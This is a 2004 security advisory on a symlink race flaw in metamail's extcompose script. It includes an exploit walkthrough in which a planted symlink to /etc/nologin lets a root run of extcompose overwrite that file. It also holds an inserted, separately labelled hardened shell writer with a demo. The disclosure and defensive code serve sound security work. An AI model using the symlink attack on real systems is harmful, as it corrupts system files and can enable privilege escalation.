extcompose.txt

Posted Mar 13, 2004
Authored by Shaun Colley | Site nettwerked.co.uk

Extcompose, a function of the metamail package, fails to properly verify a file exists prior to writing to it, and will accept symbolic links, leaving it open to being an attack vector.

tags | advisory
SHA-256 | ecb0d56a71d017b5a7e9ee58f1fd7f55abb82c34705174f94c74945fd4205bde

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product: Extcompose included with the common
metamail package.
http://bmrc.berkeley.edu/~trey/emacs/metamail.html

Versions: All
Bug: Symlink bug / race condition
Impact: Attackers can write to arbitrary files,
and in theory, elevate privileges
Date: March 11, 2004
Author: Shaun Colley
Email: shaunige@yahoo.co.uk
WWW: http://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*



Introduction
#############

With the popular 'metamail' package (included in most
popular Linux distributions), there is a script
included called 'extcompose' (usually located at
/usr/bin/extcompose and /usr/bin/extcompose.sigh).

A symlink vulnerability exists in the extcompose
script, which can allow an attacker to overwrite/write
to arbitrary files with the privileges of the invoking
user, due to the fact that Extcompose does not check
that the output filename is not a symlink.

Due to the popularity of metamail, extcompose is
present on a large percentage of Linux systems.

"The extcompose program will allow a user on a
properly-equipped work-station to enter the
appropriate data to enable a mail message he is
sending to make reference to "external" data, that is,
data that is not included in the mail message itself
but is otherwise available on the network via a
suitable mechanism." - From the extcompose(1) man
page.



The bug
########

The vulnerability presents itself when extcompose
takes user data and writes the relevant output to the
file specified by the user on the command line. The
extcompose script, unfortunately, does not check for
the existence of the output file specified, nor does it
check for the possibility of the filename specified
being a symlink - it just *blindly* writes its output
to the file with a bunch of "echo [data] >> file"
commands.

If an attacker creates a symlink with the name of the
file specified by the invoking user of the script,
arbitrary files can be corrupted/overwritten with the
privileges of the invoking user, and in theory,
privileges could possibly be elevated.

For example, if extcompose were run by root and an
attacker had created a symlink to /etc/nologin, or
worse, the results could be quite severe. An example
attack is demonstrated below.

Because the attacker must know the filename specified
by the invoking user of extcompose in order to create
the symlink, this could be considered a race condition
(i.e. the attacker might see the unsuspecting user
typing the command in an office environment, and
quickly create the symlink using her terminal).
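The unsafe pattern in the script is the chain of "echo [data] >> file" redirections, which follow whatever the output path happens to be at write time. As an added example that is not part of this advisory or of the metamail package, the POSIX sh writer below refuses symlinks and pre-existing files, then creates the output under noclobber so that a link dropped between the check and the write makes the redirection fail instead of being followed. The function names safe_write_mime and demo_symlink_refused, and the stand-in "nologin" file in a throwaway directory, are assumptions constructed for this example.

```shell
#!/bin/sh
# Hardened replacement for the "echo [data] >> file" pattern used by
# extcompose (example code, not the original script).

# safe_write_mime OUTFILE CONTENT
# Writes CONTENT to OUTFILE only if OUTFILE does not yet exist.
# Returns 0 on success, 1 if OUTFILE is a symlink, already exists, or
# appeared before the file could be created.
safe_write_mime() {
    out=$1
    body=$2
    # 1. -L tests the path itself, so a dangling or live symlink is refused
    #    before anything is opened; -e refuses an ordinary existing file.
    if [ -L "$out" ] || [ -e "$out" ]; then
        printf 'refusing to write: %s exists or is a symbolic link\n' "$out" >&2
        return 1
    fi
    # 2. noclobber (set -C) makes ">" fail instead of truncating when the path
    #    exists at open time (bash attempts the create with O_EXCL), which
    #    closes the check-then-write window the advisory calls a race.
    #    The subshell keeps noclobber local to this one redirection.
    ( set -C; printf '%s\n' "$body" > "$out" ) || {
        printf 'refusing to write: %s appeared before it could be created\n' "$out" >&2
        return 1
    }
    return 0
}

# demo_symlink_refused
# Reproduces the advisory's scenario in a temporary directory (constructed
# for this example): a symlink with the expected output name points at a
# stand-in for /etc/nologin. The hardened writer must refuse it and leave
# the target untouched, while a genuinely fresh path must still be written.
# Prints "ok" and returns 0 on success, 1 on any failure.
demo_symlink_refused() {
    tmp=$(mktemp -d) || return 1
    printf 'original\n' > "$tmp/nologin"          # stand-in for /etc/nologin
    ln -s "$tmp/nologin" "$tmp/mailfile"          # planted link, as in the advisory
    if safe_write_mime "$tmp/mailfile" 'Content-type: message/external-body' 2>/dev/null; then
        rm -rf "$tmp"
        return 1                                   # must never succeed
    fi
    target=$(cat "$tmp/nologin")
    safe_write_mime "$tmp/fresh" 'Content-type: text/plain' || { rm -rf "$tmp"; return 1; }
    fresh=$(cat "$tmp/fresh")
    rm -rf "$tmp"
    [ "$target" = "original" ] && [ "$fresh" = "Content-type: text/plain" ] || return 1
    echo ok
    return 0
}
```

The -L test alone is not enough on its own, because the path can change between the test and the redirection; the noclobber create is what makes the check meaningful. The same two-step shape (refuse links, then create exclusively) is what a C rewrite would express as open(2) with O_CREAT|O_EXCL, which also refuses to follow a symlink.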


The exploit
############

An example exploit scenario is demonstrated below:


##
kid$ ln -s /etc/nologin /directory/mailfile

[...]

root# /usr/bin/extcompose /directory/mailfile

Where is the external data that you want this mail
message to reference?
1 -- In a local file
2 -- In an AFS file
3 -- In an anonymous FTP directory on the Internet
4 -- In an Internet FTP directory that requires a
valid login
5 -- Under the control of a mail server that will
send the data on request

Please enter a number from 1 to 5: 1

Enter the full path name for the file:
/home/shaun/outlooksploit.html
Please enter the MIME content-type for the externally
referenced data: text/plain

Is this data already encoded for email transport?
1 -- No, it is not encoded
2 -- Yes, it is encoded in base64
3 -- Yes, it is encoded in quoted-printable
4 -- Yes, it is encoded using uuencode
2

[...mailfile is written with generated MIME data...]

[...]

attack$ cat /etc/nologin
Content-type: message/external-body;
access-type=local-file;
name="/home/shaun/outlooksploit.html"

Content-type: text/plain
Content-transfer-encoding: base64
###


As demonstrated, extcompose does not safely deal with
file handling, thus presenting the possibility of
exploitation to overwrite/corrupt arbitrary files with
the privileges of the user running 'extcompose'. In
theory, this could lead to escalation of privileges.


#####
NOTE:
#####

The script '/usr/bin/extcompose.sigh', which is almost
identical, is also vulnerable.



The fix
########

No fix exists. I have attempted to contact the
author of metamail ('extcompose' is part of the
metamail package), but metamail is no longer
maintained, although it is still packaged in many
Linux distributions.


Workaround: Run 'extcompose' with a low privileged
account.



Credit
#######

Vulnerability discovered by shaun2k2 / Shaun Colley.




Thank you for your time.
Shaun.
